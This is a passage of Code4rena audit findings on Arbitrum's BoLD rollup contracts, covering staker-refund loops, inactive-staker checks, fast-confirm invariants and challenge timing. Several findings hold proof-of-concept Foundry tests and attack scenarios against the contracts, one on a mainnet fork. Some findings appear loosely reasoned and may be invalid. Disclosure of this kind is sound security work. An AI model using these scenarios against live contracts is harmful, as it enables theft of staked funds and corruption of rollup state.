The impact of this issue can be significant, as it can lead to incorrect state updates and potentially cause the contract to behave unexpectedly in certain scenarios. This could have implications for the overall functionality and security of the contract, especially if the buffer.bufferBlocks value is used in other parts of the contract logic.

To illustrate the concept further, here's an example of how the code could be modified to address the issue:

if (buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max) {
    buffer.bufferBlocks = bufferConfig_.max;
} else if (buffer.bufferBlocks < bufferConfig_.threshold) {
    buffer.bufferBlocks = bufferConfig_.threshold;
}

By using an else if statement instead of separate if statements, the conditions are evaluated in the correct order, and the assignment of buffer.bufferBlocks will be consistent with the intended behavior.

Tools Used

Vs
src\bridge\SequencerInbox.sol:847-865

Recommended Mitigation Steps

Combine the two conditions into a single if statement with appropriate logic:

if (buffer.bufferBlocks == 0 || buffer.bufferBlocks > bufferConfig_.max) {
    buffer.bufferBlocks = bufferConfig_.max;
} else if (buffer.bufferBlocks < bufferConfig_.threshold) {
    buffer.bufferBlocks = bufferConfig_.threshold;
}

This way, the conditions are evaluated in the correct order, and the assignment of buffer.bufferBlocks will be consistent with the intended behavior.

Assessed type

Error

Stakers may not be refunded during rollup upgrade

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/BOLDUpgradeAction.sol#L341-#L363
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L274-#L279

Vulnerability details

Impact

During the process of upgrading the rollup contract, there exists a potential issue where the number of stakers exceeds the expected limit by the protocol. The function responsible for refunding existing stakers, pausing and upgrading the old rollup, uses a check to ensure the stakers count does not exceeds 50. However the rollup itself does not include any preventative measures to ensure that the number of stakers does not surpass this limit when creating a new stakes RollupCore.createnewStake(). As a result, if the number of stakers exceeds 50, only the first 50 stakers will be force refunded, while the rest may not receive their refunds.

As I understand the expectations are that the number of stakers will not get close to this number, nothings prevents this to happen. Stakers beyond the initial 50 may not receive their refunds during the upgrade process, leading to potential financial losses and dissatisfaction among affected stakeholders. Failure to ensure fair treatment of all stakers could erode trust in the smart contract system and damage the project's reputation within the community.

Proof of Concept

The provided code snippet illustrates the logic for handling the upgrade process and force refunding the stakers. It is shown how the stakerCount is hardcoded to 50 if it exceeds that number:

    /// @dev    Refund the existing stakers, pause and upgrade the current rollup to
    ///         allow them to withdraw after pausing
    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
 @>         stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }

Tools Used

Manual review

Recommended Mitigation Steps

Implementing an upper bound for stakers when creating a new stake in the RollupCore::createNewStake() function can help mitigate the risk of exceeding the staker limit during rollup upgrades

Assessed type

Invalid Validation

Incorrect check in `requireInactiveStaker` allows validators to withdraw their stakes for pending assertions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L573

Vulnerability details

Impact

Validators can withdraw their assets during pending assertions

Proof of Concept

In BoLD rollup, the validators are allowed to withdraw their assets when they are inactive which means when they are not a part of current assertions, and this is checked in requireInactiveStaker function as follows:

function requireInactiveStaker(address stakerAddress) internal view {
    require(isStaked(stakerAddress), "NOT_STAKED");
    // A staker is inactive if
    // a) their last staked assertion is the latest confirmed assertion
    // b) their last staked assertion have a child
    bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
    bool isLatestConfirmed = lastestAssertion == latestConfirmed();
    bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0;
    require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
}

It assumes that a staker is inactive when its latest assertion has a child, which is wrong.
Here's an example diagram that shows the case:
Withdraw logic

As shown in the diagram, the validator of Assertion1 can withdraw their stake even though the assertion is in pending.

Here's a test case to show withdrawal is possible when the assertion is in the process(Can be added in Rollup.t.sol to test):

function _createNewState() internal returns (AssertionState memory afterState, bytes32 inboxAcc) {
    uint256 sequencerInboxCount = userRollup.bridge().sequencerMessageCount();

    afterState.machineStatus = MachineStatus.FINISHED;
    afterState.globalState.bytes32Vals[0] = keccak256(abi.encodePacked("BLOCK_HASH", uint256(sequencerInboxCount))); // blockhash
    afterState.globalState.bytes32Vals[1] = keccak256(abi.encodePacked("SEND_ROOT", uint256(sequencerInboxCount))); // sendroot
    afterState.globalState.u64Vals[0] = uint64(sequencerInboxCount); // inbox count
    afterState.globalState.u64Vals[1] = 0; // pos in msg

    inboxAcc = userRollup.bridge().sequencerInboxAccs(sequencerInboxCount - 1);

    _createNewBatch();
} 

function testAuditWithdrawDuringAssertion() public {
    AssertionState memory s0;
    s0.machineStatus = MachineStatus.FINISHED;

    (AssertionState memory s1, bytes32 acc1) = _createNewState();

    bytes32 a1Hash = RollupLib.assertionHash({
        parentAssertionHash: genesisHash,
        afterState: s1,
        inboxAcc: acc1
    });

    AssertionInputs memory assertion = AssertionInputs({
        beforeStateData: BeforeStateData({
            sequencerBatchAcc: bytes32(0),
            prevPrevAssertionHash: bytes32(0),
            configData: ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: s1.globalState.u64Vals[0]
            })
        }),
        beforeState: s0,
        afterState: s1
    });

    // Create 1st assertion
    vm.prank(validator1);
    userRollup.newStakeOnNewAssertion({
        tokenAmount: BASE_STAKE,
        assertion: assertion,
        expectedAssertionHash: a1Hash,
        withdrawalAddress: validator1
    });
    vm.stopPrank();

    // Preparation for 2nd assertion
    (AssertionState memory s2, bytes32 acc2) = _createNewState();

    bytes32 a2Hash = RollupLib.assertionHash({
        parentAssertionHash: a1Hash,
        afterState: s2,
        inboxAcc: acc2
    });

    assertion = AssertionInputs({
        beforeStateData: BeforeStateData({
            sequencerBatchAcc: acc1,
            prevPrevAssertionHash: genesisHash,
            configData: ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: s2.globalState.u64Vals[0]
            })
        }),
        beforeState: s1,
        afterState: s2
    });

    // Move the time forward
    vm.roll(block.number + 75);

    // Create 2nd assertion
    vm.prank(validator2);
    userRollup.newStakeOnNewAssertion({
        tokenAmount: BASE_STAKE,
        assertion: assertion,
        expectedAssertionHash: a2Hash,
        withdrawalAddress: validator2Withdrawal
    });
    vm.stopPrank();

    // Validator 1 can withdraw
    vm.prank(validator1);
    userRollup.returnOldDeposit();
    vm.prank(validator1);
    userRollup.withdrawStakerFunds();

    assertEq(token.balanceOf(validator1), 1 ether);
}

Tools Used

Manual Review, Foundry

Recommended Mitigation Steps

When the last staked assertion has a child, it should validate if it is confirmed.

function requireInactiveStaker(address stakerAddress) internal view {
    require(isStaked(stakerAddress), "NOT_STAKED");
    // A staker is inactive if
    // a) their last staked assertion is the latest confirmed assertion
    // b) their last staked assertion have a child
    bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
    bool isLatestConfirmed = lastestAssertion == latestConfirmed();
    AssertionNode storage assertion = getAssertionStorage(lastestAssertion);
    bool haveChild = assertion.firstChildBlock > 0;
    bool isConfirmed = assertion.status == AssertionStatus.Confirmed;
    require(isLatestConfirmed || (haveChild && isConfirmed), "STAKE_ACTIVE");
}

Assessed type

Context

Participants who didn't deposit into edge challenge manager can still get a refund

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L429

Vulnerability details

Impact

When the staking is disabled after it was enabled for some time, All participants who have confirmed edges later, will be able to refund themselves although they didn't stake any amount in the first place.

Proof of Concept

An example to demonstrate the issue:

  • a new edge challenge manager is deployed disabling staking
  • Bob creates a edge challange for an correct assertion.
  • Since staking is disabled, Bob won't transfer any stake amount.
	if (address(st) != address(0) && sa != 0) {

EdgeChallengeManager.sol:L429

  • Bob has their edge confrimed.
  • Bob doesn't call refundStake Immediately but decides to wait
  • After some time, the protocol enabled the staking again.
  • Bob now calls refundStake
  • Bob receives stake amount although he didn't stake any in the beginning.

Tools Used

Manual analysis

Recommended Mitigation Steps

A flag for each participant should be used to know wether they staked or not.

Assessed type

Other

`cleanupOldRollup()` reverts due to premature out of bounds

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L341-L363

Vulnerability details

Impact

cleanupOldRollup() gets the stakerCount from the oldRollup, then loops over that number if they are less than 50 or 50 addresses if they are over 50 stakers.

  • Rollup.stakerCount() gets the number of staker
  • Rollup.getStakerAddress() gets the staker address from the _stakerList array
  • Rollup.forceRefundStaker() makes the staker's stake withdrawable and then deletes the staker

However, by deleting a staker, the array is being reduced from the right while the by incrementing the loop, we are skipping addresses from the left.

Proof of Concept

        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);

            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }

By increaasing the index i, and getting the next staker address, the loop will run out of bounds since the array is being reduced in the OLD_ROLLUP contract.

This is not an issue with the old rollup, but with the loop depicted above.

Tools Used

MANUAL REVIEW, Josephdara

Recommended Mitigation Steps

Always get the first address in the loop, only change that if the currentChallenge for the first address is not zero.

uint64 j;
       for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(j);

            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }else{
                j++;
            }
        }

Assessed type

Error

Two correct assertion chains could possibly happen which breaks a core invariant in BoLD

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L236

Vulnerability details

Impact

anyTrustFastConfirmer is supposed to be set only on an AnyTrust chain, it can force confirm any pending assertion, this is a feature which allows a committee members (multi-sig) to confirm assertions quicker.

For this reason, deadline, prev, and challenge validations are skipped, unlike other kind of validations (e.g. parentAssertionHash, confirmState, assertionHash is currently pending) are still applied. Those are done in confirmAssertionInternal.

However, it doesn't check the status of its sibling (rival assertion) which allows confirming the intended assertion even if it has a confirmed sibling. This should never happen as it creates two correct assertion chains. In other words, we would get two confirmed assertions which have the same parent. This breaks a core invariant in BoLD that is, at any point of time, only one assertion chain can be correct.

Proof of Concept

Assume we have the following assertion chain

A -- B -- C

C is confirmed.

anyTrustFastConfirmer want to confirm a new assertion under B, let's call it D

So we would have

 A -- B -- C
       \-- D

anyTrustFastConfirmer will call fastConfirmNewAssertion which does the following:

  • It requires expectedAssertionHash to be supplied.
        // Must supply expectedAssertionHash to fastConfirmNewAssertion
        require(expectedAssertionHash != bytes32(0), "EXPECTED_ASSERTION_HASH");

RollupUserLogic.sol:L278

  • It checks for prevAssertion existence
getAssertionStorage(prevAssertion).requireExists();

RollupUserLogic.sol:L286

  • If the assertion to be created does not exist, it create a new one, otherwise, it skips this part.
        if (status == AssertionStatus.NoAssertion) {
            // If not exists, we create the new assertion
            (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertion, expectedAssertionHash);

RollupUserLogic.sol:L288

  • Last step, call fastConfirmAssertion which checks if the caller is the anyTrustFastConfirmer, then calls confirmAssertionInternal skipping the validations that are normally done.

  • If we examine confirmAssertionInternal, we find that it has two checks only;

    • it checks if the assertion exists and is pending.
     		// Check that assertion is pending, this also checks that assertion exists
     		require(assertion.status == AssertionStatus.Pending, "NOT_PENDING");

    RollupCore.sol:L243-L245

    • validate data against assertionHash pre-image

As noticed, there is no check if the sibling is already confirmed. Thus, we would have two siblings confirmed which breaks a core invariant in BoLD.

Tools Used

Manual analysis

Recommended Mitigation Steps

Checks if there is a already another child confirmed, revert. This is recommended to prevent breaking the invariant. However, if you still want to confirm the assertion anyway, remove the confirmation of the other confirmed child.

Assessed type

Other

Malicious user can create a challenge to lock staker fund during upgrade.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L341

Vulnerability details

Impact

Malicious user can create a challenge to lock staker fund during upgrade.

Proof of Concept

To upgrade the rollup contract,

the step is:

  1. deploy the BOLDUpgradeAction.sol contract.
  2. upgrade executor delegate call BOLDUpgradeAction.sol and trigger the upgrade.

during the upgrade, the function clean out some old state is called first

    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            // strange, what is the purpose of this check?
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;
                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);

first the old rollup contract is paused,

then if the the staker is staked and there is no active challange, the codo trigger forceRefundStaker

if (staker.isStaked && staker.currentChallenge == 0) {
    address[] memory stakersToRefund = new address[](1);
    stakersToRefund[0] = stakerAddr;
    IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
}

then in the end, the code upgrade the rollup to one that allows validators to withdraw even when the old roll is paused

the problem is that the old roll up does not get unpaused / resumed,

if there is ongoing challange during the upgrade time,

the function below will not be called.

  IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
  1. if there is an ongoing challange, the staker cannot withdraw their fund.
  2. if the contract is paused, the ongoing challange cannot be resolved by calling the Old rollup complete Challange function
  3. the ongoing challange cannot be resolved, while upgrade the rollup to one that allows validators to withdraw fund even when paused,

because of the unresolved challange, staker fund is locked.

Sponsor confirms that the contract IMPL_PATCHED_OLD_ROLLUP_USER comes from this PR:

https://github.com/OffchainLabs/nitro-contracts/pull/48/files

the whenNotPaused modifier is removed from the function in the contract IMPL_PATCHED_OLD_ROLLUP_USER

returnOldDeposit
reduceDeposit
withdrawStakerFunds

if a staker wants to withdraw the fund from old roll up contract.

they needs to call withdrawStakerFunds

but if the stakers want to call withdrawStakerFunds,

the validator needs to call reduceDeposit / returnOldDeposit first increment the withdrawal fund amount.

but calling these two function requires that there is no ongoing challange for a staker

https://github.com/OffchainLabs/nitro-contracts/blob/90037b996509312ef1addb3f9352457b8a99d6a6/src/rollup/RollupUserLogic.sol#L616

  /**
     * @notice Verify that the given address is staked and not actively in a challenge
     * @param stakerAddress Address to check
     */
    function requireUnchallengedStaker(address stakerAddress) private view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        require(currentChallenge(stakerAddress) == NO_CHAL_INDEX, "IN_CHAL");
    }

I think the severity is high because a user can just put some fund to intentionally challange a staker by frontrunnnig the upgrade to DOS the staker from withdraw their fund.

whether this finding is in-scope may have some debate:

from the contest readme:

https://github.com/code-423n4/2024-05-arbitrum-foundation?tab=readme-ov-file#automated-findings--publicly-known-issues

Any issues whose root cause exists in nitro-contracts@77ee9de is considered out of scope but may be eligible for our bug bounty.

but while the root cause is that the new IMPL_PATCHED_OLD_ROLLUP_USER does not remove the whenNotPaused modifier in the function completeChallange

the root cause is also that the upgrade contract does not unpause / resume the old rollup after the upgrade.

the good things is in the worst case if this happens,

the old roll up logic can be upgrade again to resolve the issue.

Tools Used

Manual Review

Recommended Mitigation Steps

two ways to resolve the issues:

  1. resume / unpause the old rollup contract during the upgrade.
    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();
        ... 
         IOldRollupAdmin(address(OLD_ROLLUP)).resume();
    }
  1. remove the whenNotPaused modifier from the function completeChallange in the PR

https://github.com/OffchainLabs/nitro-contracts/pull/48/files

Assessed type

Invalid Validation

`BOLDUpgradeAction.sol` will fail to upgrade contracts due to error in the `perform` function

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/BOLDUpgradeAction.sol#L350-L359

Vulnerability details

Impact

An error in the BOLDUpgradeAction.sol contract prevents it from upgrading and deploying new BOLD contracts.

Proof of Concept

The perform function serves as the entry point in the BOLDUpgradeAction.sol and is responsible for migrating stakers from the old rollup and deploying the challenge manager with a new rollup contract.

One of the first subroutines in this function is the cleanupOldRollup().

    function perform(address[] memory validators) external {
        // tidy up the old rollup - pause it and refund stakes
        cleanupOldRollup();

This subroutine pauses the old rollup contract and attempts to refund existing stakers.

    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

>>      uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
>>          address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }

This function contains a bug that prevents execution of the subsequent procedures. Let's check the forceRefundStaker in the old rollup contract.

According to:
https://docs.arbitrum.io/build-decentralized-apps/reference/useful-addresses

Proxy: https://etherscan.io/address/0x5eF0D09d1E6204141B4d37530808eD19f60FBa35
Implementation: https://etherscan.io/address/0x72f193d0f305f532c87a4b9d0a2f407a3f4f585f#code

RollupAdminLogic.sol

    function forceRefundStaker(address[] calldata staker) external override whenPaused {
        require(staker.length > 0, "EMPTY_ARRAY");
        for (uint256 i = 0; i < staker.length; i++) {
            require(_stakerMap[staker[i]].currentChallenge == NO_CHAL_INDEX, "STAKER_IN_CHALL");
            reduceStakeTo(staker[i], 0);
>>          turnIntoZombie(staker[i]);
        }
        emit OwnerFunctionCalled(22);
    }

RollupCore.sol

    function turnIntoZombie(address stakerAddress) internal {
        Staker storage staker = _stakerMap[stakerAddress];
        _zombies.push(Zombie(stakerAddress, staker.latestStakedNode));
>>      deleteStaker(stakerAddress);
    }

    function deleteStaker(address stakerAddress) private {
        Staker storage staker = _stakerMap[stakerAddress];
        require(staker.isStaked, "NOT_STAKED");
        uint64 stakerIndex = staker.index;
        _stakerList[stakerIndex] = _stakerList[_stakerList.length - 1];
        _stakerMap[_stakerList[stakerIndex]].index = stakerIndex;
>>      _stakerList.pop();
        delete _stakerMap[stakerAddress];
    }

From the above code, it is evident that the staker's address is eventually deleted from the _stakerList, causing the array to shrink. As a result, the cleanupOldRollup function will throw an "array out-of-bounds" error because it tries to iterate through an array with the original number of elements.

Coded POC, here we use mainnet fork with only the cleanupOldRollup function.

// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

import {Test} from "forge-std/Test.sol";
import "forge-std/console.sol";

struct OldStaker {
    uint256 amountStaked;
    uint64 index;
    uint64 latestStakedNode;
    // currentChallenge is 0 if staker is not in a challenge
    uint64 currentChallenge; // 1. cannot have current challenge
    bool isStaked; // 2. must be staked
}

interface IOldRollup {
    function pause() external;
    function forceRefundStaker(address[] memory stacker) external;
    function getStakerAddress(uint64 stakerNum) external view returns (address);
    function stakerCount() external view returns (uint64);
    function getStaker(address staker) external view returns (OldStaker memory);
}

contract C4 is Test {
    IOldRollup oldRollup;
    address admin;
    function setUp() public {
        uint256 forkId = vm.createFork("https://rpc.ankr.com/eth");
        vm.selectFork(forkId);
        oldRollup = IOldRollup(0x5eF0D09d1E6204141B4d37530808eD19f60FBa35);
        admin = 0x3ffFbAdAF827559da092217e474760E2b2c3CeDd;
    }

    function test_Cleanup() public {
        vm.startPrank(admin);
        oldRollup.pause();
        uint64 stakerCount = oldRollup.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            // FAILS with panic: array out-of-bounds access 
            address stakerAddr = oldRollup.getStakerAddress(i);
            OldStaker memory staker = oldRollup.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;
                oldRollup.forceRefundStaker(stakersToRefund);
            }
        }
    }
}

Tools Used

Foundry

Recommended Mitigation Steps

    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
+       for (uint64 i = 0; i < stakerCount;) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
+               stakerCount -= 1;
+           } else {
+               i++;
+           }
        }

Assessed type

DoS

Wining a challenge by engineering time

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L511

Vulnerability details

Impact

If the difference between challengePeriodBlocks and the total unrivaled time of a malicious assertion claim is less than the delay between sending a transaction and mining that transaction, the malicious assertion claim will always win regardless of the total unrivaled time of the valid assertion claim.

Proof of Concept

Please have a look at the following time demonstration for better understanding:

 ---- t1 ---- t1 + k ---- t1 + tH ---- t1 + tH + tA ---- t1 + k + tH ---- t1 + tH + tA + k ---- t1 + k + tH + k ----> t

    Honest    Honest       Evil         Evil               Honest               Evil                  Honest
    Create    Create       Rival &      Confirm            Confirm              Confirm               Confirm
                           Create
    Send      Mined        Send         Send               Send                 Mined                 Mined

                                                           Evil
                                                           Rival &
                                                           Create
                                                           Mined
  • challengePeriodBlocksInTime: challengePeriodBlocks in time.
  • t1: the time that an honest party sends a tx of creating an edge (whether creating a layer zero edge or bisecting an edge at any level)
  • k: the delay between a tx is sent and being mined on Ethereum.
  • t1 + k: the time that the honest party's tx of creating an edge is mined
  • tH: the remaining unrivaled time that the honest party requires to win by confirming the valid assertion claim by time. totalUnriveledTimeInTime(valid assertion claim) = challengePeriodBlocksInTime - tH
  • t1 + tH: the time that the evil party sends the tx of rivaling the honest party's edge as well as creating a new edge. This will be mined at t1 + k + tH.
  • tA: the remaining unrivaled time that the evil party requires to win by confirming the malicious assertion claim by time. totalUnriveledTimeInTime(malicious assertion claim) = challengePeriodBlocksInTime - tA
  • t1 + tH + tA: the time that the evil party sends the confirmation tx by calling confirmEdgeByTime to confirm the malicious assertion claim.
  • t1 + k + tH: the time that the honest party sends the confirmation tx by calling confirmEdgeByTime to confirm the valid assertion claim, also the time that the evil party's rivaling and the new edge creation is mined.
  • t1 + k + tH + tA: the time that the evil party's confirmation tx is mined.
  • t1 + k + tH + k: the time that the honest party's confirmation tx is mined.
   function confirmEdgeByTime(bytes32 edgeId, AssertionStateData calldata claimStateData) public {
       ChallengeEdge storage topEdge = store.get(edgeId);
       if (!topEdge.isLayerZero()) {
           revert EdgeNotLayerZero(topEdge.id(), topEdge.staker, topEdge.claimId);
       }

       uint64 assertionBlocks = 0;
       // if the edge is block level and the assertion being claimed against was the first child of its predecessor
       // then we are able to count the time between the first and second child as time towards
       // the this edge
       bool isBlockLevel = ChallengeEdgeLib.levelToType(topEdge.level, NUM_BIGSTEP_LEVEL) == EdgeType.Block;
       if (isBlockLevel && assertionChain.isFirstChild(topEdge.claimId)) {
           assertionChain.validateAssertionHash(
               topEdge.claimId,
               claimStateData.assertionState,
               claimStateData.prevAssertionHash,
               claimStateData.inboxAcc
           );
           assertionBlocks = assertionChain.getSecondChildCreationBlock(claimStateData.prevAssertionHash)
               - assertionChain.getFirstChildCreationBlock(claimStateData.prevAssertionHash);
       }

       uint256 totalTimeUnrivaled = store.confirmEdgeByTime(edgeId, assertionBlocks, challengePeriodBlocks);

       emit EdgeConfirmedByTime(edgeId, store.edges[edgeId].mutualId(), totalTimeUnrivaled);
   }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L511

Happy Scenario:

Suppose the total unriveled time of the valid assertion claim is challengePeriodBlocksInTime - tH, so if the evil party delays only tH seconds in rivaling an edge, the honest party will win and can confirm the valid assertion claim by time by calling confirmEdgeByTime.

  • The honest party sends an tx to create an edge (whether creating a layer zero edge or bisecting an edge at any level) at time t1.
  • This tx is mined k seconds later. So, this tx is mined at t1 + k.
  • The evil party does not rival this edge, so the timer of this edge will tick in favor of the honest party.
  • When delay in rivaling this edge reaches to tH, the honest party interprets that the total unrivaled time of the valid assertion claim is now challengePeriodBlocksInTime - tH + tH, so he is able to win by confirming it by time. So, the honest party sends confirmEdgeByTime tx at t1 + k + tH to confirm the valid assertion claim.
  • This tx is mined at t1 + k + tH + k. So, the valid assertion claim is confirmed, and the honest party wins.

Unhappy Scenario:

Suppose the total unriveled time of the valid assertion claim is challengePeriodBlocksInTime - tH, so if the evil party delays only tH seconds in rivaling an edge, the honest party will win and can confirm the valid assertion claim by time by calling confirmEdgeByTime.

Moreover suppose that total unriveled time of the malicious assertion claim is challengePeriodBlocksInTime - tA, so if the honest party delays only tA seconds in rivaling an edge, the evil party will win and can confirm the malicious assertion claim by time by calling confirmEdgeByTime.

  • The honest party sends an tx to create an edge (whether creating a layer zero edge or bisecting an edge at any level) at time t1.
  • This tx is mined k seconds later. So, this tx is mined at t1 + k.
  • The evil party does not rival this edge, so the timer of this edge will tick in favor of the honest party.
  • The evil party sends a tx to rival this edge as well as creating a new edge at t1 + tH.
  • The evil party sends a tx of confirmEdgeByTime at t1 + tH + tA to confirm the malicious assertion claim.
  • When delay in rivaling this edge reaches to tH, the honest party interprets that the total unrivaled time of the valid assertion claim is now challengePeriodBlocksInTime - tH + tH, so he is able to win by confirming it by time. So, the honest party sends confirmEdgeByTime tx at t1 + k + tH to confirm the valid assertion claim.
  • The evil party's edge creation tx is mined at t1 + tH + k. This tx rivals the honest party's edge as well as creating a new edge.
  • The evil party's confirmEdgeByTime tx is mined at t1 + tH + tA + k erlier than the honest party's confirmation tx to be mined. So, the malicious assertion claim is confirmed, and the evil party wins.
  • The honest party's confirmEdgeByTime tx is mined at t1 + k + tH + k, but it is reverted because its rival is already confirmed.

Even if the honest party rivals the evil party's edge at time t1 + k + tH, it will be mined at t1 + k + tH + k which is too late because the evil party's confirm tx is mined at t1 + k + tH + tA.

The only condition is that tA <= k.

Example 1 (where tA < tH):

 -- 604000 -- 604048 ---- 604100 ------- 604124 ---------- 604148 -------- 604172 ----------------- 604196 ----> t

 ---- t1 ---- t1 + k ---- t1 + tH ---- t1 + tH + tA ---- t1 + k + tH ---- t1 + tH + tA + k ---- t1 + k + tH + k ----> t

    Honest    Honest       Evil         Evil               Honest               Evil                  Honest
    Create    Create       Rival &      Confirm            Confirm              Confirm               Confirm
                           Create
    Send      Mined        Send         Send               Send                 Mined                 Mined

                                                           Evil
                                                           Rival &
                                                           Create
                                                           Mined   
  • challengePeriodBlocksInTime = 604800 (7 days)
  • tH: 100
  • tA: 24
  • k: 48

Honest party creates an edge at time 604000, and it is mined at 604000 + 48 = 604048. The total unrivaled time of the valid assertion claim is 604700, so if the evil party makes delay of 100 seconds, the honest party can confirm the valid assertion claim. Moreover, the total unrivaled time of the malicious assertion claim is 604776, so if honest party makes delay of 24 seconds, the evil party can confirm the malicious assertion claim.

Evil party sends a tx at 604000 + 100 = 604100 to rival the honest party's edge and also creates a new edge. Then the evil party sends a tx at 604000 + 100 + 24 = 604124 to confirm the malicious assertion claim.

